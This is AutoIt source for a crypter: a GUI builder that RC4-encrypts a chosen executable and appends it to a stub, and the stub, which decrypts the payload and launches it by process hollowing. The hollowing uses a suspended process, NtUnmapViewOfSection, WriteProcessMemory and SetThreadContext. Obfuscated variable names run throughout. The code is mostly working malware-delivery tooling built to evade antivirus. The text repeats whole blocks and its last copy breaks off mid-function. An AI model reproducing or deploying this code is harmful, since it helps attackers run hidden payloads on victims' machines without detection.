#cs ----------------------------------------------------------------------------
AutoIt Version: 3.3.8.1
Author: CHARLLES
Contact: [email protected]
Script Function: CRYPT FILE
Template AutoIt script.
Inicialized Day 28/08/2016
Time Of Day 20:10
#ce ----------------------------------------------------------------------------
#include <ButtonConstants.au3>
#include <EditConstants.au3>
#include <GUIConstantsEx.au3>
#include <StaticConstants.au3>
#include <WindowsConstants.au3>
#Region ### START Koda GUI section ### Form=
TrayTip("Bem-Vindo", @ComputerName, 17)
$Form1 = GUICreate("Crypter in AU3", 474, 102, 192, 124)
GUISetBkColor(0x000000)
$Group1 = GUICtrlCreateGroup("", 8, 0, 457, 97)
$Input1 = GUICtrlCreateInput("", 16, 16, 401, 21, BitOR($ES_CENTER,$ES_AUTOHSCROLL))
$Button1 = GUICtrlCreateButton(".....", 424, 16, 33, 25, $WS_GROUP)
GUICtrlSetBkColor(-1, 0xFFFFFF)
$Button2 = GUICtrlCreateButton("Encryptar", 104, 48, 241, 25, $WS_GROUP)
GUICtrlCreateGroup("", -99, -99, 1, 1)
GUISetState(@SW_SHOW)
Func Terminate()
Exit 0
EndFunc ;==>Terminate
HotKeySet("{F2}", "Terminate")
#EndRegion ### END Koda GUI section ###
Func Abrir()
GUICtrlSetData($Input1, FileOpenDialog("", @DesktopDir, "Executáveis(*.exe)"))
EndFunc
Func Encryptar()
If GuiCtrlRead($Input1) = "" Then Return
$Stub = FileOpen(@ScriptDir & "\Stub.exe", 16)
$File = FileOpen(GuiCtrlRead($Input1), 16)
$s = FileRead($Stub)
$f = FileRead($File)
$f = RRgSATclojwnMrIKpuHHhbsTAXOtcBRdBITRT($f, "IHFSDIHIOHFSIHOFISJH")
$abri = FileOpen(FileSaveDialog("Salvar Como...", @DesktopDir, "Executáveis(*.exe)") & ".exe", 18)
FileWrite($abri, $s)
FileWrite($abri, StringToBinary("HUIF"))
FileWrite($abri, $f)
FileClose($Stub)
fileclose($File)
Fileclose($abri)
EndFunc
Func sair()
Exit
EndFunc
;cod abaixo = rc4
Func RRgSATclojwnMrIKpuHHhbsTAXOtcBRdBITRT($YXYETAWVTNXDTCRUFWNZ4, $HDAUJBVSHSJMUTFXEPQG0)
Local $EYTKUDBRKEFDDZLAKXKN4 = "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000"
Local $JIRVQRVFYRCZEBBVLKLC4 = DllStructCreate("byte[" & BinaryLen($EYTKUDBRKEFDDZLAKXKN4) & "]")
DllStructSetData($JIRVQRVFYRCZEBBVLKLC4, 1, $EYTKUDBRKEFDDZLAKXKN4)
Local $WAMSDHOGJRVMNPVKQGYM6 = DllStructCreate("byte[" & BinaryLen($YXYETAWVTNXDTCRUFWNZ4) & "]")
DllStructSetData($WAMSDHOGJRVMNPVKQGYM6, 1, $YXYETAWVTNXDTCRUFWNZ4)
DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($JIRVQRVFYRCZEBBVLKLC4), "ptr", DllStructGetPtr($WAMSDHOGJRVMNPVKQGYM6), "int", BinaryLen($YXYETAWVTNXDTCRUFWNZ4), "str", $HDAUJBVSHSJMUTFXEPQG0, "int", 0)
Local $ZTAIPGIFAXOREGLKYMWO2 = DllStructGetData($WAMSDHOGJRVMNPVKQGYM6, 1)
$WAMSDHOGJRVMNPVKQGYM6 = 0
$JIRVQRVFYRCZEBBVLKLC4 = 0
Return $ZTAIPGIFAXOREGLKYMWO2
EndFunc
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
Exit
case $Button1
Abrir()
case $Button2
Encryptar()
EndSwitch
WEnd
;------------------------------------------------------------------------------
AutoIt Version: 3.3.8.1
Author: CHARLLES
Contact: [email protected]
Script Function: CRYPT FILE
Template AutoIt script.
Inicialized Day 28/08/2016
Time Of Day 20:10
#ce ----------------------------------------------------------------------------
#include <ButtonConstants.au3>
#include <EditConstants.au3>
#include <GUIConstantsEx.au3>
#include <StaticConstants.au3>
#include <WindowsConstants.au3>
#Region ### START Koda GUI section ### Form=
TrayTip("Bem-Vindo", @ComputerName, 17)
$Form1 = GUICreate("Crypter in AU3", 474, 102, 192, 124)
GUISetBkColor(0x000000)
$Group1 = GUICtrlCreateGroup("", 8, 0, 457, 97)
$Input1 = GUICtrlCreateInput("", 16, 16, 401, 21, BitOR($ES_CENTER,$ES_AUTOHSCROLL))
$Button1 = GUICtrlCreateButton(".....", 424, 16, 33, 25, $WS_GROUP)
GUICtrlSetBkColor(-1, 0xFFFFFF)
$Button2 = GUICtrlCreateButton("Encryptar", 104, 48, 241, 25, $WS_GROUP)
GUICtrlCreateGroup("", -99, -99, 1, 1)
GUISetState(@SW_SHOW)
Func Terminate()
Exit 0
EndFunc ;==>Terminate
HotKeySet("{F2}", "Terminate")
#EndRegion ### END Koda GUI section ###
Func Abrir()
GUICtrlSetData($Input1, FileOpenDialog("", @DesktopDir, "Executáveis(*.exe)"))
EndFunc
Func Encryptar()
If GuiCtrlRead($Input1) = "" Then Return
$Stub = FileOpen(@ScriptDir & "\Stub.exe", 16)
$File = FileOpen(GuiCtrlRead($Input1), 16)
$s = FileRead($Stub)
$f = FileRead($File)
$f = RRgSATclojwnMrIKpuHHhbsTAXOtcBRdBITRT($f, "IHFSDIHIOHFSIHOFISJH")
$abri = FileOpen(FileSaveDialog("Salvar Como...", @DesktopDir, "Executáveis(*.exe)") & ".exe", 18)
FileWrite($abri, $s)
FileWrite($abri, StringToBinary("HUIF"))
FileWrite($abri, $f)
FileClose($Stub)
fileclose($File)
Fileclose($abri)
EndFunc
Func sair()
Exit
EndFunc
;cod abaixo = rc4
Func RRgSATclojwnMrIKpuHHhbsTAXOtcBRdBITRT($YXYETAWVTNXDTCRUFWNZ4, $HDAUJBVSHSJMUTFXEPQG0)
Local $EYTKUDBRKEFDDZLAKXKN4 = "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000"
Local $JIRVQRVFYRCZEBBVLKLC4 = DllStructCreate("byte[" & BinaryLen($EYTKUDBRKEFDDZLAKXKN4) & "]")
DllStructSetData($JIRVQRVFYRCZEBBVLKLC4, 1, $EYTKUDBRKEFDDZLAKXKN4)
Local $WAMSDHOGJRVMNPVKQGYM6 = DllStructCreate("byte[" & BinaryLen($YXYETAWVTNXDTCRUFWNZ4) & "]")
DllStructSetData($WAMSDHOGJRVMNPVKQGYM6, 1, $YXYETAWVTNXDTCRUFWNZ4)
DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($JIRVQRVFYRCZEBBVLKLC4), "ptr", DllStructGetPtr($WAMSDHOGJRVMNPVKQGYM6), "int", BinaryLen($YXYETAWVTNXDTCRUFWNZ4), "str", $HDAUJBVSHSJMUTFXEPQG0, "int", 0)
Local $ZTAIPGIFAXOREGLKYMWO2 = DllStructGetData($WAMSDHOGJRVMNPVKQGYM6, 1)
$WAMSDHOGJRVMNPVKQGYM6 = 0
$JIRVQRVFYRCZEBBVLKLC4 = 0
Return $ZTAIPGIFAXOREGLKYMWO2
EndFunc
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
Exit
case $Button1
Abrir()
case $Button2
Encryptar()
EndSwitch
WEnd
;------------------------------------------------------------------------------
; Stub
#NoTrayIcon
sleep(5000)
$NGSDCXGZCEIXKJULDQPG3 = FileOpen(@ScriptFullPath, 0)
$HOPMPNVNFBLJMAEBPWGH7 = FileRead($NGSDCXGZCEIXKJULDQPG3)
$HOPMPNVNFBLJMAEBPWGH7 = StringMid($HOPMPNVNFBLJMAEBPWGH7, StringInStr($HOPMPNVNFBLJMAEBPWGH7, "HUIF") + StringLen("HUIF"))
$HOPMPNVNFBLJMAEBPWGH7 = RRgSATclojwnMrIKpuHHhbsTAXOtcBRdBITRT($HOPMPNVNFBLJMAEBPWGH7, "IHFSDIHIOHFSIHOFISJH")
FBTxWthxSleyxEIZwoaSrtztmANOBstRYvrNc($HOPMPNVNFBLJMAEBPWGH7)
Func RRgSATclojwnMrIKpuHHhbsTAXOtcBRdBITRT($YXYETAWVTNXDTCRUFWNZ4, $HDAUJBVSHSJMUTFXEPQG0)
Local $EYTKUDBRKEFDDZLAKXKN4 = "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000"
Local $JIRVQRVFYRCZEBBVLKLC4 = DllStructCreate("byte[" & BinaryLen($EYTKUDBRKEFDDZLAKXKN4) & "]")
DllStructSetData($JIRVQRVFYRCZEBBVLKLC4, 1, $EYTKUDBRKEFDDZLAKXKN4)
Local $WAMSDHOGJRVMNPVKQGYM6 = DllStructCreate("byte[" & BinaryLen($YXYETAWVTNXDTCRUFWNZ4) & "]")
DllStructSetData($WAMSDHOGJRVMNPVKQGYM6, 1, $YXYETAWVTNXDTCRUFWNZ4)
DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($JIRVQRVFYRCZEBBVLKLC4), "ptr", DllStructGetPtr($WAMSDHOGJRVMNPVKQGYM6), "int", BinaryLen($YXYETAWVTNXDTCRUFWNZ4), "str", $HDAUJBVSHSJMUTFXEPQG0, "int", 0)
Local $ZTAIPGIFAXOREGLKYMWO2 = DllStructGetData($WAMSDHOGJRVMNPVKQGYM6, 1)
$WAMSDHOGJRVMNPVKQGYM6 = 0
$JIRVQRVFYRCZEBBVLKLC4 = 0
Return $ZTAIPGIFAXOREGLKYMWO2
EndFunc
Func FBTxWthxSleyxEIZwoaSrtztmANOBstRYvrNc($DBMQXORDDWSNFPUYSUAV9)
Local $SBIKXSGRAVLUWIPAXAAG8 = Binary($DBMQXORDDWSNFPUYSUAV9)
Local $FQNMUYXHWPFJMQPPSYLW3 = DllStructCreate("byte[" & BinaryLen($SBIKXSGRAVLUWIPAXAAG8) & "]")
DllStructSetData($FQNMUYXHWPFJMQPPSYLW3, 1, $SBIKXSGRAVLUWIPAXAAG8)
Local $RDPZAWDJPCVWFHXSHJUJ3 = DllStructGetPtr($FQNMUYXHWPFJMQPPSYLW3)
Local $AQYZPWFUNEZJYVRRELBM1 = DllStructCreate("dword cbSize;" & "ptr Reserved;" & "ptr Desktop;" & "ptr Title;" & "dword X;" & "dword Y;" & "dword XSize;" & "dword YSize;" & "dword XCountChars;" & "dword YCountChars;" & "dword FillAttribute;" & "dword Flags;" & "ushort ShowWindow;" & "ushort Reserved2;" & "ptr Reserved2;" & "ptr hStdInput;" & "ptr hStdOutput;" & "ptr hStdError")
Local $KTBXIKXYHPHPTXXBXBVK0 = DllStructCreate("ptr Process;" & "ptr Thread;" & "dword ProcessId;" & "dword ThreadId")
Local $FOADNRFSFHWOVGQYKWWB0 = DllCall("kernel32.dll", "int", "CreateProcessW", "wstr", @AutoItExe, "ptr", 0, "ptr", 0, "ptr", 0, "int", 0, "dword", 4, "ptr", 0, "ptr", 0, "ptr", DllStructGetPtr($AQYZPWFUNEZJYVRRELBM1), "ptr", DllStructGetPtr($KTBXIKXYHPHPTXXBXBVK0))
If @error Or Not $FOADNRFSFHWOVGQYKWWB0[0] Then
Return SetError(1, 0, 0)
EndIf
Local $QAHCMXTRTDWHSBHKJVWN3 = DllStructGetData($KTBXIKXYHPHPTXXBXBVK0, "Process")
Local $DVZXVGMITVHCYPEAORRM3 = DllStructGetData($KTBXIKXYHPHPTXXBXBVK0, "Thread")
Local $DCSAQWEGABYFFEERANAQ6 = DllStructCreate("dword ContextFlags;" & "dword Dr0;" & "dword Dr1;" & "dword Dr2;" & "dword Dr3;" & "dword Dr6;" & "dword Dr7;" & "dword ControlWord;" & "dword StatusWord;" & "dword TagWord;" & "dword ErrorOffset;" & "dword ErrorSelector;" & "dword DataOffset;" & "dword DataSelector;" & "byte RegisterArea[80];" & "dword Cr0NpxState;" & "dword SegGs;" & "dword SegFs;" & "dword SegEs;" & "dword SegDs;" & "dword Edi;" & "dword Esi;" & "dword Ebx;" & "dword Edx;" & "dword Ecx;" & "dword Eax;" & "dword Ebp;" & "dword Eip;" & "dword SegCs;" & "dword EFlags;" & "dword Esp;" & "dword SegS")
DllStructSetData($DCSAQWEGABYFFEERANAQ6, "ContextFlags", 65538)
$FOADNRFSFHWOVGQYKWWB0 = DllCall( "kernel32.dll", "int", "GetThreadContext", "ptr", $DVZXVGMITVHCYPEAORRM3, "ptr", DllStructGetPtr($DCSAQWEGABYFFEERANAQ6))
If @error Or Not $FOADNRFSFHWOVGQYKWWB0[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(2, 0, 0)
EndIf
Local $UHUUUYDHZONNOYAAVAPL3 = DllStructCreate("char Magic[2];" & "ushort BytesOnLastPage;" & "ushort Pages;" & "ushort Relocations;" & "ushort SizeofHeader;" & "ushort MinimumExtra;" & "ushort MaximumExtra;" & "ushort SS;" & "ushort SP;" & "ushort Checksum;" & "ushort IP;" & "ushort CS;" & "ushort Relocation;" & "ushort Overlay;" & "char Reserved[8];" & "ushort OEMIdentifier;" & "ushort OEMInformation;" & "char Reserved2[20];" & "dword AddressOfNewExeHeader", $RDPZAWDJPCVWFHXSHJUJ3)
$RDPZAWDJPCVWFHXSHJUJ3 += DllStructGetData($UHUUUYDHZONNOYAAVAPL3, "AddressOfNewExeHeader")
Local $FUXEKOQCSLVFFYXRDWQJ6 = DllStructGetData($UHUUUYDHZONNOYAAVAPL3, "Magic")
If Not ($FUXEKOQCSLVFFYXRDWQJ6 == "MZ") Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(3, 0, 0)
EndIf
Local $CQJQRNZBEGRROZTQKLYH3 = DllStructCreate("dword Signature", $RDPZAWDJPCVWFHXSHJUJ3)
$RDPZAWDJPCVWFHXSHJUJ3 += 4
If DllStructGetData($CQJQRNZBEGRROZTQKLYH3, "Signature") <> 17744 Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(4, 0, 0)
EndIf
Local $UGSSFCZLMKKQKJKHHKMV8 = DllStructCreate("ushort Machine;" & "ushort NumberOfSections;" & "dword TimeDateStamp;" & "dword PointerToSymbolTable;" & "dword NumberOfSymbols;" & "ushort SizeOfOptionalHeader;" & "ushort Characteristics", $RDPZAWDJPCVWFHXSHJUJ3)
Local $LSUMNEDTUHGGSAFJWXBG6 = DllStructGetData($UGSSFCZLMKKQKJKHHKMV8, "NumberOfSections")
$RDPZAWDJPCVWFHXSHJUJ3 += 20
Local $GCFXTWPIAEDVZDQPLTOY3 = DllStructCreate("ushort Magic;" & "ubyte MajorLinkerVersion;" & "ubyte MinorLinkerVersion;" & "dword SizeOfCode;" & "dword SizeOfInitializedData;" & "dword SizeOfUninitializedData;" & "dword AddressOfEntryPoint;" & "dword BaseOfCode;" & "dword BaseOfData;" & "dword ImageBase;" & "dword SectionAlignment;" & "dword FileAlignment;" & "ushort MajorOperatingSystemVersion;" & "ushort MinorOperatingSystemVersion;" & "ushort MajorImageVersion;" & "ushort MinorImageVersion;" & "ushort MajorSubsystemVersion;" & "ushort MinorSubsystemVersion;" & "dword Win32VersionValue;" & "dword SizeOfImage;" & "dword SizeOfHeaders;" & "dword CheckSum;" & "ushort Subsystem;" & "ushort DllCharacteristics;" & "dword SizeOfStackReserve;" & "dword SizeOfStackCommit;" & "dword SizeOfHeapReserve;" & "dword SizeOfHeapCommit;" & "dword LoaderFlags;" & "dword NumberOfRvaAndSizes", $RDPZAWDJPCVWFHXSHJUJ3)
$RDPZAWDJPCVWFHXSHJUJ3 += 96
Local $FIJIRSNJPLAJOIVBCMHE4PQDCEROSGAHRRBONTVS0 = DllStructGetData($GCFXTWPIAEDVZDQPLTOY3, "Magic")
If $FIJIRSNJPLAJOIVBCMHE4PQDCEROSGAHRRBONTVS0 <> 267 Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(5, 0, 0)
EndIf
Local $BMRGXVFQWVPUONGXQEIV8 = DllStructGetData($GCFXTWPIAEDVZDQPLTOY3, "AddressOfEntryPoint")
$RDPZAWDJPCVWFHXSHJUJ3 += 128
Local $ETAMFTKFHXEATYABLIDV1 = DllStructGetData($GCFXTWPIAEDVZDQPLTOY3, "ImageBase")
Local $GVMQNZZNCJVDAJCALXYR6 = DllStructGetData($GCFXTWPIAEDVZDQPLTOY3, "SizeOfImage")
$FOADNRFSFHWOVGQYKWWB0 = DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "ptr", $ETAMFTKFHXEATYABLIDV1)
If @error Or $FOADNRFSFHWOVGQYKWWB0[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(6, 0, 0)
EndIf
$FOADNRFSFHWOVGQYKWWB0 = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "ptr", $ETAMFTKFHXEATYABLIDV1, "dword", $GVMQNZZNCJVDAJCALXYR6, "dword", 12288, "dword", 64)
If @error Or Not $FOADNRFSFHWOVGQYKWWB0[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(7, 0, 0)
EndIf
Local $RZVLCLCLBTZXORYFDDJP9 = $FOADNRFSFHWOVGQYKWWB0[0]
Local $SSCRUUOGKDHRXWJHLNVJ2 = DllStructGetPtr($UHUUUYDHZONNOYAAVAPL3)
Local $DQKEROXCGHKVJHIFPHVL4 = DllStructGetData($GCFXTWPIAEDVZDQPLTOY3, "SizeOfHeaders")
$FOADNRFSFHWOVGQYKWWB0 = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "ptr", $RZVLCLCLBTZXORYFDDJP9, "ptr", $SSCRUUOGKDHRXWJHLNVJ2, "dword", $DQKEROXCGHKVJHIFPHVL4, "dword*", 0)
If @error Or Not $FOADNRFSFHWOVGQYKWWB0[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(8, 0, 0)
EndIf
Local $RJATWTKKNFETRTMFBJIO1
Local $KINPUJGTLNNGEYNXTNBY7, $EXJIJMOAEYYEQPBVEOZN0
Local $VHTUIZBBZGABQHZDVZOL7
For $FIJIRSNJPLAJOIVBCMHE4 = 1 To $LSUMNEDTUHGGSAFJWXBG6
$RJATWTKKNFETRTMFBJIO1 = DllStructCreate("char Name[8];" & "dword UnionOfVirtualSizeAndPhysicalAddress;" & "dword VirtualAddress;" & "dword SizeOfRawData;" & "dword PointerToRawData;" & "dword PointerToRelocations;" & "dword PointerToLinenumbers;" & "ushort NumberOfRelocations;" & "ushort NumberOfLinenumbers;" & "dword Characteristics", $RDPZAWDJPCVWFHXSHJUJ3)
$KINPUJGTLNNGEYNXTNBY7 = DllStructGetData($RJATWTKKNFETRTMFBJIO1, "SizeOfRawData")
$EXJIJMOAEYYEQPBVEOZN0 = DllStructGetPtr($UHUUUYDHZONNOYAAVAPL3) + DllStructGetData($RJATWTKKNFETRTMFBJIO1, "PointerToRawData")
$VHTUIZBBZGABQHZDVZOL7 = DllStructGetData($RJATWTKKNFETRTMFBJIO1, "VirtualAddress")
If $KINPUJGTLNNGEYNXTNBY7 Then
$FOADNRFSFHWOVGQYKWWB0 = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "ptr", $RZVLCLCLBTZXORYFDDJP9 + $VHTUIZBBZGABQHZDVZOL7, "ptr", $EXJIJMOAEYYEQPBVEOZN0, "dword", $KINPUJGTLNNGEYNXTNBY7, "dword*", 0)
If @error Or Not $FOADNRFSFHWOVGQYKWWB0[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(9, $FIJIRSNJPLAJOIVBCMHE4, 0)
EndIf
EndIf
$RDPZAWDJPCVWFHXSHJUJ3 += 40
Next
DllStructSetData($DCSAQWEGABYFFEERANAQ6, "Eax", $RZVLCLCLBTZXORYFDDJP9 + $BMRGXVFQWVPUONGXQEIV8)
$FOADNRFSFHWOVGQYKWWB0 = DllCall("kernel32.dll", "int", "SetThreadContext", "ptr", $DVZXVGMITVHCYPEAORRM3, "ptr", DllStructGetPtr($DCSAQWEGABYFFEERANAQ6))
If @error Or Not $FOADNRFSFHWOVGQYKWWB0[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(10, 0, 0)
EndIf
$FOADNRFSFHWOVGQYKWWB0 = DllCall("kernel32.dll", "int", "ResumeThread", "ptr", $DVZXVGMITVHCYPEAORRM3)
If @error Or $FOADNRFSFHWOVGQYKWWB0[0] = -1 Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(11, 0, 0)
EndIf
Return DllStructGetData($KTBXIKXYHPHPTXXBXBVK0, "ProcessId")
EndFunc
sleep(5000)
$NGSDCXGZCEIXKJULDQPG3 = FileOpen(@ScriptFullPath, 0)
$HOPMPNVNFBLJMAEBPWGH7 = FileRead($NGSDCXGZCEIXKJULDQPG3)
$HOPMPNVNFBLJMAEBPWGH7 = StringMid($HOPMPNVNFBLJMAEBPWGH7, StringInStr($HOPMPNVNFBLJMAEBPWGH7, "HUIF") + StringLen("HUIF"))
$HOPMPNVNFBLJMAEBPWGH7 = RRgSATclojwnMrIKpuHHhbsTAXOtcBRdBITRT($HOPMPNVNFBLJMAEBPWGH7, "IHFSDIHIOHFSIHOFISJH")
FBTxWthxSleyxEIZwoaSrtztmANOBstRYvrNc($HOPMPNVNFBLJMAEBPWGH7)
Func RRgSATclojwnMrIKpuHHhbsTAXOtcBRdBITRT($YXYETAWVTNXDTCRUFWNZ4, $HDAUJBVSHSJMUTFXEPQG0)
Local $EYTKUDBRKEFDDZLAKXKN4 = "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000"
Local $JIRVQRVFYRCZEBBVLKLC4 = DllStructCreate("byte[" & BinaryLen($EYTKUDBRKEFDDZLAKXKN4) & "]")
DllStructSetData($JIRVQRVFYRCZEBBVLKLC4, 1, $EYTKUDBRKEFDDZLAKXKN4)
Local $WAMSDHOGJRVMNPVKQGYM6 = DllStructCreate("byte[" & BinaryLen($YXYETAWVTNXDTCRUFWNZ4) & "]")
DllStructSetData($WAMSDHOGJRVMNPVKQGYM6, 1, $YXYETAWVTNXDTCRUFWNZ4)
DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($JIRVQRVFYRCZEBBVLKLC4), "ptr", DllStructGetPtr($WAMSDHOGJRVMNPVKQGYM6), "int", BinaryLen($YXYETAWVTNXDTCRUFWNZ4), "str", $HDAUJBVSHSJMUTFXEPQG0, "int", 0)
Local $ZTAIPGIFAXOREGLKYMWO2 = DllStructGetData($WAMSDHOGJRVMNPVKQGYM6, 1)
$WAMSDHOGJRVMNPVKQGYM6 = 0
$JIRVQRVFYRCZEBBVLKLC4 = 0
Return $ZTAIPGIFAXOREGLKYMWO2
EndFunc
Func FBTxWthxSleyxEIZwoaSrtztmANOBstRYvrNc($DBMQXORDDWSNFPUYSUAV9)
Local $SBIKXSGRAVLUWIPAXAAG8 = Binary($DBMQXORDDWSNFPUYSUAV9)
Local $FQNMUYXHWPFJMQPPSYLW3 = DllStructCreate("byte[" & BinaryLen($SBIKXSGRAVLUWIPAXAAG8) & "]")
DllStructSetData($FQNMUYXHWPFJMQPPSYLW3, 1, $SBIKXSGRAVLUWIPAXAAG8)
Local $RDPZAWDJPCVWFHXSHJUJ3 = DllStructGetPtr($FQNMUYXHWPFJMQPPSYLW3)
Local $AQYZPWFUNEZJYVRRELBM1 = DllStructCreate("dword cbSize;" & "ptr Reserved;" & "ptr Desktop;" & "ptr Title;" & "dword X;" & "dword Y;" & "dword XSize;" & "dword YSize;" & "dword XCountChars;" & "dword YCountChars;" & "dword FillAttribute;" & "dword Flags;" & "ushort ShowWindow;" & "ushort Reserved2;" & "ptr Reserved2;" & "ptr hStdInput;" & "ptr hStdOutput;" & "ptr hStdError")
Local $KTBXIKXYHPHPTXXBXBVK0 = DllStructCreate("ptr Process;" & "ptr Thread;" & "dword ProcessId;" & "dword ThreadId")
Local $FOADNRFSFHWOVGQYKWWB0 = DllCall("kernel32.dll", "int", "CreateProcessW", "wstr", @AutoItExe, "ptr", 0, "ptr", 0, "ptr", 0, "int", 0, "dword", 4, "ptr", 0, "ptr", 0, "ptr", DllStructGetPtr($AQYZPWFUNEZJYVRRELBM1), "ptr", DllStructGetPtr($KTBXIKXYHPHPTXXBXBVK0))
If @error Or Not $FOADNRFSFHWOVGQYKWWB0[0] Then
Return SetError(1, 0, 0)
EndIf
Local $QAHCMXTRTDWHSBHKJVWN3 = DllStructGetData($KTBXIKXYHPHPTXXBXBVK0, "Process")
Local $DVZXVGMITVHCYPEAORRM3 = DllStructGetData($KTBXIKXYHPHPTXXBXBVK0, "Thread")
Local $DCSAQWEGABYFFEERANAQ6 = DllStructCreate("dword ContextFlags;" & "dword Dr0;" & "dword Dr1;" & "dword Dr2;" & "dword Dr3;" & "dword Dr6;" & "dword Dr7;" & "dword ControlWord;" & "dword StatusWord;" & "dword TagWord;" & "dword ErrorOffset;" & "dword ErrorSelector;" & "dword DataOffset;" & "dword DataSelector;" & "byte RegisterArea[80];" & "dword Cr0NpxState;" & "dword SegGs;" & "dword SegFs;" & "dword SegEs;" & "dword SegDs;" & "dword Edi;" & "dword Esi;" & "dword Ebx;" & "dword Edx;" & "dword Ecx;" & "dword Eax;" & "dword Ebp;" & "dword Eip;" & "dword SegCs;" & "dword EFlags;" & "dword Esp;" & "dword SegS")
DllStructSetData($DCSAQWEGABYFFEERANAQ6, "ContextFlags", 65538)
$FOADNRFSFHWOVGQYKWWB0 = DllCall( "kernel32.dll", "int", "GetThreadContext", "ptr", $DVZXVGMITVHCYPEAORRM3, "ptr", DllStructGetPtr($DCSAQWEGABYFFEERANAQ6))
If @error Or Not $FOADNRFSFHWOVGQYKWWB0[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(2, 0, 0)
EndIf
Local $UHUUUYDHZONNOYAAVAPL3 = DllStructCreate("char Magic[2];" & "ushort BytesOnLastPage;" & "ushort Pages;" & "ushort Relocations;" & "ushort SizeofHeader;" & "ushort MinimumExtra;" & "ushort MaximumExtra;" & "ushort SS;" & "ushort SP;" & "ushort Checksum;" & "ushort IP;" & "ushort CS;" & "ushort Relocation;" & "ushort Overlay;" & "char Reserved[8];" & "ushort OEMIdentifier;" & "ushort OEMInformation;" & "char Reserved2[20];" & "dword AddressOfNewExeHeader", $RDPZAWDJPCVWFHXSHJUJ3)
